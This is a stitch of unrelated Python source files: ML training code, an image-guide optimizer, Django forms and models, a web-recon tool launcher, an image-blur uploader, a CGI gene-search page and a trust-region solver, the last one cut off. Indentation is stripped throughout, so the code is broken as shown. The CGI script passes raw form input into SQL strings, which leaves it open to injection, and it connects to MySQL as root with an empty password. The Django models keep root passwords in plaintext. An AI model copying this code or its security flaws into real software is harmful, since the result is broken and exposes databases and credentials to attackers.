self.log('val_loss', val_loss, prog_bar=True)
#Edge filter performance
preds = F.sigmoid(output) > self.hparams["filter_cut"] #Maybe send to CPU??
edge_positive = preds.sum().float()
if ('pid' in self.hparams["regime"]):
y_pid = batch.pid[batch.e_radius[0,subset_ind]] == batch.pid[batch.e_radius[1,subset_ind]]
edge_true = y_pid.sum()
edge_true_positive = (y_pid & preds).sum().float()
else:
edge_true = batch.y[subset_ind].sum()
edge_true_positive = (batch.y[subset_ind].bool() & preds).sum().float()
self.log_dict({
'val_eff': edge_true_positive/edge_true,
'val_pur': edge_true_positive/edge_positive}, prog_bar=True)
def optimizer_step(self, current_epoch, batch_nb, optimizer, optimizer_idx, second_order_closure=None, on_tpu=False, using_native_amp=False, using_lbfgs=False):
# warm up lr
if (self.hparams["warmup"] is not None) and (self.trainer.global_step < self.hparams["warmup"]):
lr_scale = min(1., float(self.trainer.global_step + 1) / self.hparams["warmup"])
for pg in optimizer.param_groups:
pg['lr'] = lr_scale * self.hparams["lr"]
# update params
optimizer.step()
optimizer.zero_grad()
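# Illustrative warm-up schedule for the logic above (hypothetical numbers,
# e.g. lr = 1e-3 and warmup = 100):
#   global_step 0   -> lr_scale 0.01 -> lr 1e-5
#   global_step 49  -> lr_scale 0.50 -> lr 5e-4
#   global_step 99+ -> lr_scale 1.00 -> lr 1e-3 (full learning rate)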
class FilterBaseBalanced(FilterBase):
def __init__(self, hparams):
super().__init__(hparams)
'''
Initialise the Lightning Module that can scan over different filter training regimes
'''
def training_step(self, batch, batch_idx):
emb = (None if (self.hparams["emb_channels"] == 0)
else batch.embedding) # Does this work??
with torch.no_grad():
sections = 8
cut_list = []
for j in range(sections):
subset_ind = torch.chunk(torch.arange(batch.e_radius.shape[1]), sections)[j]
output = self(torch.cat([batch.cell_data, batch.x], axis=-1), batch.e_radius[:, subset_ind], emb).squeeze() if ('ci' in self.hparams["regime"]) else self(batch.x, batch.e_radius[:, subset_ind], emb).squeeze()
cut = F.sigmoid(output) > self.hparams["filter_cut"]
cut_list.append(cut)
cut_list = torch.cat(cut_list)
num_true, num_false = batch.y.bool().sum(), (~batch.y.bool()).sum()
true_indices = torch.where(batch.y.bool())[0]
hard_negatives = cut_list & ~batch.y.bool()
hard_indices = torch.where(hard_negatives)[0]
hard_indices = hard_indices[torch.randperm(len(hard_indices))][:int(len(true_indices)*self.hparams["ratio"]/2)]
easy_indices = torch.where(~batch.y.bool())[0][torch.randint(num_false, (int(num_true.item()*self.hparams['ratio']/2),))]
combined_indices = torch.cat([true_indices, hard_indices, easy_indices])
# Shuffle indices:
combined_indices = combined_indices[torch.randperm(len(combined_indices))]
weight = torch.tensor(self.hparams["weight"])
output = (self(torch.cat([batch.cell_data, batch.x], axis=-1), batch.e_radius[:,combined_indices], emb).squeeze()
if ('ci' in self.hparams["regime"])
else self(batch.x, batch.e_radius[:,combined_indices], emb).squeeze())
if ('pid' in self.hparams["regime"]):
y_pid = batch.pid[batch.e_radius[0,combined_indices]] == batch.pid[batch.e_radius[1,combined_indices]]
loss = F.binary_cross_entropy_with_logits(output, y_pid.float(), pos_weight = weight)
else:
loss = F.binary_cross_entropy_with_logits(output, batch.y[combined_indices], pos_weight = weight)
# result = pl.TrainResult(minimize=loss)
# result.log('train_loss', loss, prog_bar=True)
self.log('train_loss', loss, prog_bar=True)
return loss
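# To summarize the sampling above (a restatement of this method, nothing new):
# the training edges are the union of
#   - all true edges,
#   - up to ratio/2 * n_true "hard" negatives (false edges the current model
#     already scores above filter_cut), and
#   - ratio/2 * n_true randomly drawn "easy" negatives,
# so the classifier keeps being shown the false edges it currently gets wrong.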
def validation_step(self, batch, batch_idx):
self.shared_evaluation(batch, batch_idx)
def test_step(self, batch, batch_idx):
self.shared_evaluation(batch, batch_idx)
def shared_evaluation(self, batch, batch_idx):
'''
This method is shared between validation steps and test steps
'''
emb = (None if (self.hparams["emb_channels"] == 0)
else batch.embedding) # Does this work??
sections = 8
score_list = []
val_loss = torch.tensor(0).float()
for j in range(sections):
subset_ind = torch.chunk(torch.arange(batch.e_radius.shape[1]), sections)[j]
output = self(torch.cat([batch.cell_data, batch.x], axis=-1), batch.e_radius[:, subset_ind], emb).squeeze() if ('ci' in self.hparams["regime"]) else self(batch.x, batch.e_radius[:, subset_ind], emb).squeeze()
scores = F.sigmoid(output)
score_list.append(scores)
if ('pid' not in self.hparams['regime']):
val_loss = val_loss + F.binary_cross_entropy_with_logits(output, batch.y[subset_ind])
else:
y_pid = batch.pid[batch.e_radius[0, subset_ind]] == batch.pid[batch.e_radius[1, subset_ind]]
val_loss = val_loss + F.binary_cross_entropy_with_logits(output, y_pid.float())
score_list = torch.cat(score_list)
cut_list = score_list > self.hparams["filter_cut"]
# result = pl.EvalResult(checkpoint_on=val_loss)
self.log("val_loss", val_loss, prog_bar=True)
# result = pl.TrainResult(minimize=val_loss)
# result.log('val_loss', val_loss)
#Edge filter performance
edge_positive = cut_list.sum().float()
if ('pid' in self.hparams["regime"]):
y_pid = batch.pid[batch.e_radius[0]] == batch.pid[batch.e_radius[1]]
edge_true = y_pid.sum()
edge_true_positive = (y_pid & cut_list).sum().float()
else:
edge_true = batch.y.sum()
edge_true_positive = (batch.y.bool() & cut_list).sum().float()
self.log_dict({
'eff': torch.tensor(edge_true_positive/edge_true),
'pur': torch.tensor(edge_true_positive/edge_positive)}) |
from torch import optim, nn
from pytti.Notebook import tqdm
from pytti import *
import pandas as pd
import math
from labellines import labelLines
def unpack_dict(D, n = 2):
ds = [{k:V[i] for k,V in D.items()} for i in range(n)]
return tuple(ds)
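# e.g. (illustrative): unpack_dict({'a': (1, 2), 'b': (3, 4)})
#   -> ({'a': 1, 'b': 3}, {'a': 2, 'b': 4})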
from scipy.signal import savgol_filter
def smooth_dataframe(df, window_size):
"""applies a moving average filter to the columns of df"""
smoothed_df = pd.DataFrame().reindex_like(df)
for key in df.columns:
smoothed_df[key] = savgol_filter(df[key], window_size, 2, mode='nearest')
return smoothed_df
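# e.g. (illustrative): smooth_dataframe(loss_df, 17) fits a window-17, order-2
# Savitzky-Golay polynomial to each column; plot_losses below uses exactly that
# call on its first loss dataframe.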
class DirectImageGuide():
"""
Image guide that uses an optimizer and torch autograd to optimize an image representation
Based on the BigGan+CLIP algorithm by advadnoun (https://twitter.com/advadnoun)
image_rep: (DifferentiableImage) image representation
embedder: (Module) image embedder
optimizer: (Class) optimizer class to use. Defaults to Adam
all other arguments are passed as kwargs to the optimizer.
"""
def __init__(self, image_rep, embedder, optimizer = None, lr = None, **optimizer_params):
self.image_rep = image_rep
self.embedder = embedder
if lr is None:
lr = image_rep.lr
optimizer_params['lr']=lr
self.optimizer_params = optimizer_params
if optimizer is None:
self.optimizer = optim.Adam(image_rep.parameters(), **optimizer_params)
else:
self.optimizer = optimizer
self.dataframe = []
def run_steps(self, n_steps,
prompts, interp_prompts, loss_augs,
stop = -math.inf, interp_steps = 0,
i_offset = 0, skipped_steps = 0):
"""
runs the optimizer
prompts: (ClipPrompt list) list of prompts
n_steps: (positive integer) steps to run
returns: the number of steps run
"""
for i in tqdm(range(n_steps)):
self.update(i+i_offset, i+skipped_steps)
losses = self.train(i+skipped_steps,
prompts, interp_prompts, loss_augs,
interp_steps = interp_steps)
if losses['TOTAL'] <= stop:
break
return i+1
def set_optim(self, opt = None):
if opt is not None:
self.optimizer = opt
else:
self.optimizer = optim.Adam(self.image_rep.parameters(), **self.optimizer_params)
def clear_dataframe(self):
self.dataframe = []
def plot_losses(self, axs):
def plot_dataframe(df, ax, legend = False):
keys = list(df)
keys.sort(reverse=True, key = lambda k:df[k].iloc[-1])
ax.clear()
df[keys].plot(ax=ax, legend = legend)
if(legend):
ax.legend(bbox_to_anchor=(1.04,1), loc="upper left")
ax.tick_params(labelbottom=True, labeltop=False, labelleft=True, labelright=False,
bottom=True, top=False, left=True, right=False)
last_x = df.last_valid_index()
lines = ax.get_lines()
colors = [l.get_color() for l in lines]
labels = [l.get_label() for l in lines]
ax.relim()
ax.autoscale_view()
labelLines(ax.get_lines(), align = False)
return dict(zip(labels, colors))
dfs = self.dataframe[:]
if dfs != []:
dfs[0] = smooth_dataframe(dfs[0], 17)
for i,(df,ax) in enumerate(zip(dfs,axs)):
if len(df.index) < 2:
return False
#m = df.apply(lambda col: col.first_valid_index())
#print(m)
#print(df.lookup(m, m.index))
#rel_loss = (df-df.lookup(m, m.index))
if not df.empty:
plot_dataframe(df, ax, legend = i == 0)
ax.set_ylabel('Loss')
ax.set_xlabel('Step')
return True
def update(self, i, stage_i):
"""
update hook called every step
"""
pass
def train(self, i, prompts, interp_prompts, loss_augs, interp_steps = 0, save_loss = True):
"""
steps the optimizer
prompts: (ClipPrompt list) list of prompts
"""
self.optimizer.zero_grad()
z = self.image_rep.decode_training_tensor()
losses = []
if self.embedder is not None:
image_embeds, offsets, sizes = self.embedder(self.image_rep, input = z)
if i < interp_steps:
t = i/interp_steps
interp_losses = [prompt(format_input(image_embeds, self.embedder, prompt),
format_input(offsets, self.embedder, prompt),
format_input(sizes, self.embedder, prompt))[0]*(1-t) for prompt in interp_prompts]
else:
t = 1
interp_losses = [0]
prompt_losses = {prompt:prompt(format_input(image_embeds, self.embedder, prompt),
format_input(offsets, self.embedder, prompt),
format_input(sizes, self.embedder, prompt)) for prompt in prompts}
aug_losses = {aug:aug(format_input(z, self.image_rep, aug), self.image_rep) for aug in loss_augs}
image_augs = self.image_rep.image_loss()
image_losses = {aug:aug(self.image_rep) for aug in image_augs}
#aug_losses.update(image_losses)
losses, losses_raw = zip(*map(unpack_dict, [prompt_losses,aug_losses,image_losses]))
losses = list(losses)
losses_raw = list(losses_raw)
for v in prompt_losses.values():
v[0].mul_(t)
total_loss = sum(map(lambda x:sum(x.values()),losses)) + sum(interp_losses)
losses_raw.append({'TOTAL':total_loss})
total_loss.backward()
self.optimizer.step()
self.image_rep.update()
#if t != 0:
# for v in prompt_losses.values():
# v[0].div_(t)
if save_loss:
if not self.dataframe:
self.dataframe = [pd.DataFrame({str(k):float(v) for k,v in loss.items()}, index=[i]) for loss in losses_raw]
for df in self.dataframe:
df.index.name = 'Step'
else:
for j,(df,loss) in enumerate(zip(self.dataframe,losses_raw)):
self.dataframe[j] = df.append(pd.DataFrame({str(k):float(v) for k,v in loss.items()}, index=[i]), ignore_index=False)
self.dataframe[j].index.name = 'Step'
return {'TOTAL':float(total_loss)}
|
""" BasicTextAnalyzer Information """
__author__ = "James Morris"
__maintainer__ = "James Morris"
__email__ = "morrisjamesharry@gmail.com"
__license__ = "MIT"
__version__ = "0.0.1"
__credits__ = ["Tyler Barrus and Peter Norvig (for pyspellchecker"]
__url__ = "https://github.com/morrisjh/Basic-Text-Analyzer"
|
import datetime
from captcha.fields import CaptchaField
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from haystack.forms import SearchForm
from .models import Resource, Assembly
class PublicationForm(forms.Form):
name = forms.CharField(max_length=100)
type = forms.CharField(max_length=100)
start_date = forms.DateField()
end_date = forms.DateField()
def clean(self):
cleaned_data = super(PublicationForm, self).clean()
start_date = cleaned_data.get("start_date")
end_date = cleaned_data.get("end_date")
if start_date and end_date and (start_date > end_date):
self._errors['start_date'] = self._errors.get('start_date', [])
self._errors['start_date'].append("Start date must be before end date.")
return cleaned_data
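# Illustrative check (hypothetical data): a form bound with
#   {'name': 'x', 'type': 'y', 'start_date': '2020-02-01', 'end_date': '2020-01-01'}
# would fail is_valid() because clean() records the start_date error above.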
class SignUpForm(UserCreationForm):
first_name = forms.CharField(max_length=30, required=False, help_text='Optional.')
last_name = forms.CharField(max_length=30, required=False, help_text='Optional.')
email = forms.EmailField(max_length=254, help_text='Required. Enter a valid email address.')
class Meta:
model = User
fields = ('username', 'first_name', 'last_name', 'email', 'password1', 'password2',)
class AllauthSignupForm(forms.Form):
captcha = CaptchaField()
def signup(self, request, user):
""" Required, or else it throws deprecation warnings """
pass
|
#!/usr/bin/env python3
#
# Copyright (c) 2021 Iliass Alami Qammouri
#
# This is free software, licensed under the MIT License.
# See /LICENSE for more information.
#
import os
import sys
import socket
import string
import requests
#import argparse
from art import *
from termcolor import colored
from modules.dirsearchscan import dirsearchScan
from modules.niktoscan import niktoScan
from modules.nmapscan import nmapScan
from modules.fullscan import fullScan
from modules.exit import exit
ans = True
version = '1.0.5'
home = os.path.expanduser("~")
def reOpen():
installed = True if os.path.exists("/bin/webmap") else False
if installed:
os.system("sudo webmap")
sys.exit()
else:
os.system("sudo python3 webmap.py")
sys.exit()
def clear():
os.system('cls' if os.name == 'nt' else 'clear')
def createDir(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def notValid(func, var, num=1) :
# both branches of the original check printed the same warning,
# so just clear the screen, warn the user and re-prompt
clear()
print(colored("\nNot Valid Choice Try again\n", 'red', attrs=['reverse']))
func()
def dirOutput(var, path, url) :
if len(var) == 0 :
var = path +"/"+ url
return var
def callFunc(func, num=1) :
if num == True :
clear()
ans = True
while ans:
func()
else:
clear()
func()
def verCheck():
verUrl = 'https://raw.githubusercontent.com/Anteste/WebMap/master/conf/version.txt'
try:
verRqst = requests.get(verUrl)
verSc = verRqst.status_code
if verSc == 200:
githubVer = verRqst.text
githubVer = githubVer.strip()
if version == githubVer:
print(colored(f"Your WebMap version is Up-To-Date\n",'yellow', attrs=['reverse']))
else:
print(colored(f"Your WebMap version is Out-Dated, New Version Available: {format(githubVer)} \n",'red', attrs=['reverse']))
else:
print('[ Status : {} '.format(verSc) + ']' + '\n')
except Exception as e:
print('\n' + '[-] Exception : ' + str(e)) |
import numpy
import cv2
import requests
import sys
import os.path
import socket
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class exit_codes:
EX_OK = 0
EX_USAGE = 64
EX_NOINPUT = 66
EX_TIMEOUT = 124
EX_GENERIC = 1
class server_addresses:
DEFAULT = "http://wewewew.com/apirest"
def checkArguments(arguments):
if len(arguments) != 3:
print(bcolors.FAIL,
"Image missing and / or degree of distortion argument missing. \n",
bcolors.HEADER,
"Example:",
bcolors.OKBLUE,
"python3", arguments[0], "[image_path] [distortion_degree]",
bcolors.ENDC)
sys.exit(exit_codes.EX_USAGE)
def checkFile(file):
if not os.path.isfile(file):
print(bcolors.FAIL,
"Image missing:\n",
bcolors.WARNING,
file,
bcolors.ENDC)
sys.exit(exit_codes.EX_NOINPUT)
def checkDistortion(distortion):
distortion = int(distortion) if distortion.isnumeric() else None
if distortion is None or distortion < 1 or (distortion % 2) == 0:
print(bcolors.FAIL,
"Distortion degree is incorrect: \n",
bcolors.HEADER,
"The distortion degree must be greater than 0 and an odd number.",
bcolors.ENDC)
sys.exit(exit_codes.EX_USAGE)
def gaussianBlurProcess(image, distortion):
return cv2.GaussianBlur(
image, (distortion, distortion), cv2.BORDER_DEFAULT)
def sendBinaryData(path_data, camNumber):
timeoutTime = 30
file = {
'media': open(path_data, 'rb'),
}
values = {
'camname': socket.gethostname()
}
try:
response = requests.post(server_addresses.DEFAULT,
files=file, data=values, timeout=timeoutTime)
response.raise_for_status()
except requests.exceptions.HTTPError as errh:
print("Http Error:", errh)
except requests.exceptions.ConnectionError as errc:
print("Error Connecting:", errc)
except requests.exceptions.Timeout as errt:
print("Timeout Error:", errt)
except requests.exceptions.RequestException as err:
print("Oops: Something Else", err)
def main():
# Checks the arguments, and inputs.
checkArguments(sys.argv)
checkFile(sys.argv[1])
checkDistortion(sys.argv[2])
# Save the arguments on variables for easier handling.
imagePath = sys.argv[1]
distortion = int(sys.argv[2])
# Load the image.
binaryImage = cv2.imread(imagePath)
# Process the image.
processedBinaryImage = gaussianBlurProcess(binaryImage, distortion)
# Save the processed image on the same path, overwriting the original image.
cv2.imwrite(imagePath, processedBinaryImage)
# Sends the processed image to the data-analysis system. ( URL pending ).
# sendBinaryData(imagePath)
# Good bye, have a great day!
sys.exit(exit_codes.EX_OK)
main()
|
from django.contrib import admin
from .models import (IP)
# Register your models here.
admin.site.register(IP)
|
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, BooleanField
from wtforms.validators import DataRequired, Length, Email, EqualTo, ValidationError
class formURL(FlaskForm):
site = StringField('Site URL', validators=[DataRequired()])
keyword = StringField('Label Keyword', validators=[Length(max=35)])
submit = SubmitField('Submit') |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
# Create your models here.
# Users
class Users(models.Model):
id = models.AutoField(primary_key=True)
username = models.CharField(max_length=50)
password = models.CharField(max_length=50)
# All servers
class Servers(models.Model):
host_id = models.AutoField(primary_key=True)
ip = models.CharField(max_length=50)
hostname = models.CharField(max_length=50)
root_password = models.CharField(max_length=50)
host_type = models.CharField(max_length=50, default='servers')
# Server initialization status
class InitServer(models.Model):
id = models.AutoField(primary_key=True)
server_list = models.CharField(max_length=500)
create_time = models.DateTimeField(auto_now_add=True)
status = models.CharField(max_length=50, default=None, null=True)
# Hosts
class Hosts(models.Model):
host_id = models.AutoField(primary_key=True)
ip = models.CharField(max_length=50)
hostname = models.CharField(max_length=50)
srv_type = models.CharField(max_length=50)
def __str__(self):
return self.hostname
# yum repository
class Repository(models.Model):
repo_id = models.AutoField(primary_key=True)
ip = models.CharField(max_length=50)
port = models.CharField(max_length=10)
# Databases
class Databases(models.Model):
db_id = models.AutoField(primary_key=True)
srv_type = models.CharField(max_length=50)
db_type = models.CharField(max_length=20)
root_password = models.CharField(max_length=20)
srv_password = models.CharField(max_length=20)
# Tasks
class Tasks(models.Model):
task_id = models.AutoField(primary_key=True)
srv_type = models.CharField(max_length=50)
host_list = models.CharField(max_length=500)
host_id = models.CharField(max_length=500)
create_time = models.DateTimeField(auto_now_add=True)
task_status = models.CharField(max_length=50, default='NewTask')
# Service types available for installation
class Services(models.Model):
service = models.CharField(max_length=50)
is_db = models.BooleanField(default=False)
db_type = models.CharField(max_length=20, null=True)
|
#! c:/Python27/python.exe
#This is the script for GO term search
import cgi, MySQLdb, subprocess, os, random
os.environ['HOME']='c:\Apache\htdocs'
os.environ['MPLCONFIGDIR']='c:\Apache\htdocs'
import matplotlib
matplotlib.use('Agg')
import numpy
import matplotlib.pyplot as plt
import matplotlib.figure
import pylab
def process():
form=cgi.FieldStorage()
go1=form.getfirst('genefunction1')
gosearch1=form.getfirst('gfsearch1')
go2=form.getfirst('genefunction2')
gosearch2=form.getfirst('gfsearch2')
go3=form.getfirst('genefunction3')
gosearch3=form.getfirst('gfsearch3')
exp1=form.getvalue('exp1')
expsearch1=form.getfirst('expsearch1')
exp2=form.getvalue('exp2')
expsearch2=form.getfirst('expsearch2')
exp3=form.getvalue('exp3')
expsearch3=form.getfirst('expsearch3')
filename='result.png'
f=open('supercluster.txt','r')
rows=[i.split('\t') for i in f.readlines()]
f.close()
for i in range(len(rows)):
for j in range(len(rows[i])):
rows[i][j]=float(rows[i][j])
if go1=="1" and go2=="1" and go3=="1" and exp1=="1" and exp2=="1" and exp3 == "1":
print 'Content-type: text/html'
print
print '<html><head>'
print '<title>Arabidopsis Athaliana Microarray Data Browser</title>'
print '</head>'
print '<body>'
print '<form action="ath.html">'
print '<div id="topbanner">'
print '<h1>Welcome to Arabidopsis Athaliana Microarray Database!</h1>'
print '</div>'
print '<div id="mainbody">'
print '<table cellpadding=5 style="border-color:black;border-style:solid;border-width:thin" width="1000" align="center">'
print '<tbody>'
print '<tr><td>'
print '<h2>Please do not leave the query area blank</h2>'
print '</td></tr>'
print '</tbody>'
print '</table>'
print '</div>'
print '</form>'
print '</body>'
print '</html>'
else:
db=MySQLdb.connect(host="localhost",user='root',passwd='')
c=db.cursor()
c.execute('use athaliana')
id_gene=[]
dataid_exp=[]
result_gene=[]
result_exp=[]
result_value=[]
if go1=="1":
id_gene1=()
elif go1=="2":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=3 and DAValue like "%s"'%('%'+gosearch1+'%'))
temp=c.fetchall()
id_gene1=[i[0] for i in temp]
id_gene1=tuple(id_gene1)
elif go1=="3":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=4 and DAValue like "%s"'%('%'+gosearch1+'%'))
temp=c.fetchall()
id_gene1=[i[0] for i in temp]
id_gene1=tuple(id_gene1)
elif go1=="4":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=5 and DAValue like "%s"'%('%'+gosearch1+'%'))
temp=c.fetchall()
id_gene1=[i[0] for i in temp]
id_gene1=tuple(id_gene1)
if go2=="1":
id_gene2=()
elif go2=="2":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=3 and DAValue like "%s"'%('%'+gosearch2+'%'))
temp=c.fetchall()
id_gene2=[i[0] for i in temp]
id_gene2=tuple(id_gene2)
elif go2=="3":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=4 and DAValue like "%s"'%('%'+gosearch2+'%'))
temp=c.fetchall()
id_gene2=[i[0] for i in temp]
id_gene2=tuple(id_gene2)
elif go2=="4":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=5 and DAValue like "%s"'%('%'+gosearch2+'%'))
temp=c.fetchall()
id_gene2=[i[0] for i in temp]
id_gene2=tuple(id_gene2)
if go3=="1":
id_gene3=()
elif go3=="2":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=3 and DAValue like "%s"'%('%'+gosearch3+'%'))
temp=c.fetchall()
id_gene3=[i[0] for i in temp]
id_gene3=tuple(id_gene3)
elif go3=="3":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=4 and DAValue like "%s"'%('%'+gosearch3+'%'))
temp=c.fetchall()
id_gene3=[i[0] for i in temp]
id_gene3=tuple(id_gene3)
elif go3=="4":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=5 and DAValue like "%s"'%('%'+gosearch3+'%'))
temp=c.fetchall()
id_gene3=[i[0] for i in temp]
id_gene3=tuple(id_gene3)
id_gene=id_gene1+id_gene2+id_gene3
id_gene=set(id_gene)
id_gene=list(id_gene)
if go1=="1" and go2=="1" and go3=="1" and (exp1!=1 or exp2!=1 or exp3!=1):
c.execute('select DataID from Data where DTypeID=1')
temp=c.fetchall()
id_gene=[i[0] for i in temp]
for i in id_gene:
c.execute('select DataName from Data use index (dataidindex) where DataID="%s"'%i)
result_gene.append(c.fetchall()[0][0])
if exp1=="1":
id_exp1=()
elif exp1=="2":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=6 and DAValue like "%s"'%('%'+expsearch1+'%'))
temp=c.fetchall()
id_exp1=[i[0] for i in temp]
id_exp1=tuple(id_exp1)
elif exp1=="3":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=7 and DAValue like "%s"'%('%'+expsearch1+'%'))
temp=c.fetchall()
id_exp1=[i[0] for i in temp]
id_exp1=tuple(id_exp1)
elif exp1=="4":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=9 and DAValue like "%s"'%('%'+expsearch1.upper()+'%'))
temp=c.fetchall()
id_exp1=[i[0] for i in temp]
id_exp1=tuple(id_exp1)
if exp2=="1":
id_exp2=()
elif exp2=="2":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=6 and DAValue like "%s"'%('%'+expsearch2+'%'))
temp=c.fetchall()
id_exp2=[i[0] for i in temp]
id_exp2=tuple(id_exp2)
elif exp2=="3":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=7 and DAValue like "%s"'%('%'+expsearch2+'%'))
temp=c.fetchall()
id_exp2=[i[0] for i in temp]
id_exp2=tuple(id_exp2)
elif exp2=="4":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=9 and DAValue like "%s"'%('%'+expsearch2.upper()+'%'))
temp=c.fetchall()
id_exp2=[i[0] for i in temp]
id_exp2=tuple(id_exp2)
if exp3=="1":
id_exp3=()
elif exp3=="2":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=6 and DAValue like "%s"'%('%'+expsearch3+'%'))
temp=c.fetchall()
id_exp3=[i[0] for i in temp]
id_exp3=tuple(id_exp3)
elif exp3=="3":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=7 and DAValue like "%s"'%('%'+expsearch3+'%'))
temp=c.fetchall()
id_exp3=[i[0] for i in temp]
id_exp3=tuple(id_exp3)
elif exp3=="4":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=9 and DAValue like "%s"'%('%'+expsearch3.upper()+'%'))
temp=c.fetchall()
id_exp3=[i[0] for i in temp]
id_exp3=tuple(id_exp3)
id_exp=id_exp1+id_exp2+id_exp3
id_exp=set(id_exp)
id_exp=list(id_exp)
if exp1=="1" and exp2=="1" and exp3=="1" and (go1!="1" or gp2!="1" or go3!="1"):
c.execute('select DataID from Data where DTypeID=2')
temp=c.fetchall()
id_exp=[i[0] for i in temp]
for i in id_exp:
c.execute('select DataName from Data use index (dataidindex) where DataID="%s"'%i)
temp=c.fetchall()
result_exp.append(temp[0])
id_exp=[i-22810-1 for i in id_exp]
if len(result_gene)!=0:
for i in id_gene:
temp_pergene=[]
temp=numpy.array(rows[(int(i)-1)])
temp=list(temp[id_exp])
result_value.append(temp)
db.commit()
os.chdir('c:\Apache\htdocs')
os.system('del result.txt')
os.system('type NUL > result.txt')
line_exp=[str(i)[2:-3] for i in result_exp]
line_gene=[str(i) for i in result_gene]
header=['ProbeID']+line_exp
f=open('result.txt','a')
f.write('\t'.join(header)+'\n')
for i in range(len(line_gene)):
for j in range(len(result_value[i])):
if result_value[i][j] == -50:
result_value[i][j] = 'N/A'
lines=[line_gene[i]]+result_value[i]
lines=[str(j) for j in lines]
f.write('\t'.join(lines)+'\n')
f.close()
print 'Content-type: text/html'
print
print '<html><head>'
print '<title>Arabidopsis Athaliana Microarray Data Browser</title>'
print '</head>'
print '<body>'
print '<div id="topbanner">'
print '<form action="index.py">'
print '<h1>Here are your results</h1>'
print '<h2>Or, you may re-modify your search</h2>'
print '<input type="submit" value="Try again">'
print '</form>'
print '<h3>For downloadable text file, right click on the following link and select "Save link as..."</h3>'
print '<a href="/result.txt" target="_blank">Download</a>'
print '</div>'
print '<div id="mainbody">'
print '<table border="1">'
print '<tbody>'
print '<tr><td width="500px"><b>Probe ID</b></td>'
for i in result_exp:
print '<td width="500px">'
print '<a href="expsearch.py?expname=%s">'%i[0]
print '<b>%s</b></a></td>'%i[0]
print '''</tr>'''
for i in range(len(result_gene)):
print '''<tr><td width="500px"><a href="gene.py?genename=%s" target="_blank">%s</td>'''%(result_gene[i],result_gene[i])
for j in range(len(result_exp)):
print '''<td width="500px">%s</td>'''%result_value[i][j]
print '''</tr>'''
print '</tbody>'
print '</table>'
print '</div>'
print '</body>'
print '</html>'
else:
print 'Content-type: text/html'
print
print '<html><head>'
print '<title>Arabidopsis Athaliana Microarray Data Browser</title>'
print '</head>'
print '<body>'
print '<div id="topbanner">'
print '<form action="ath.htm">'
print '<h1>Here are your results</h1>'
print '<h2>Or, you may re-modify your search</h2>'
print '<input type="submit" value="Try again">'
print '</form>'
print '</div>'
print '<div id="mainbody">'
print '<table width="800px">'
print '<tbody>'
print '<tr><td>No result found</td></tr>'
print '</tbody>'
print '</table>'
print '</div>'
print '</body>'
print '</html>'
if __name__=="__main__":
process()
|
# -*- coding: utf-8 -*-
import math
from typing import Callable, Tuple
import numpy
import scipy.optimize # type: ignore
from optimizer._internals.common import typing
from optimizer._internals.common.linneq import constraint_check
from optimizer._internals.common.norm import norm_l2, safe_normalize
from optimizer._internals.quad_prog import status
from optimizer._internals.quad_prog.circular_interp import circular_interp
from optimizer._internals.quad_prog.clip_solution import clip_solution
from optimizer._internals.quad_prog.quad_eval import QuadEvaluator
from overloads import bind_checker, dyn_typing
from overloads.shortcuts import assertNoInfNaN, assertNoInfNaN_float
from overloads.typedefs import ndarray
Flag = status.Flag
Status = status.Status
_eps = float(numpy.finfo(numpy.float64).eps)
def no_check_QPeval(_: QuadEvaluator) -> None:
pass
def no_check_Flag(_: Flag) -> None:
pass
@bind_checker.bind_checker_2(
input=bind_checker.make_checker_2(no_check_QPeval, assertNoInfNaN_float),
output=bind_checker.make_checker_2(assertNoInfNaN, no_check_Flag),
)
def _implimentation(qpval: QuadEvaluator, delta: float) -> Tuple[ndarray, Flag]:
g, H = qpval.g, qpval.H
if norm_l2(g) < math.sqrt(_eps):
return -g, Flag.INTERIOR
e: ndarray
v: ndarray
e, v = numpy.linalg.eigh(H)
min_lambda = float(e.min())
vg: ndarray = -g @ v
s: ndarray
if min_lambda > 0:
s = v @ (vg / e)
if norm_l2(s) <= delta:
return s, Flag.INTERIOR
flag: Flag = Flag.BOUNDARY
def secular(lambda_: float) -> float:
if min_lambda + lambda_ <= 0:
return 1 / delta
alpha: ndarray = vg / (e + lambda_)
return (1 / delta) - (1 / norm_l2(alpha))
def init_guess() -> Tuple[float, float]:
a = -min_lambda if min_lambda < 0 else 0
assert secular(a) >= 0
dx = a / 2
if not a:
dx = 1 / 2
while secular(a + dx) > 0:
dx *= 2
return (a, a + dx)
lambda_ = scipy.optimize.brentq(
secular, *init_guess(), maxiter=2 ** 31 - 1, disp=False
)
e = e + lambda_
assert not numpy.any(e < 0)
if numpy.any(e == 0):
flag = Flag.FATAL
e[e == 0] = _eps
s = v @ (vg / e)
return delta * safe_normalize(s), flag
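# Sketch of the boundary case above (restating the code, no new math): with
# H = V diag(e) V^T and vg = V^T(-g), the step s(lambda) = V (vg / (e + lambda))
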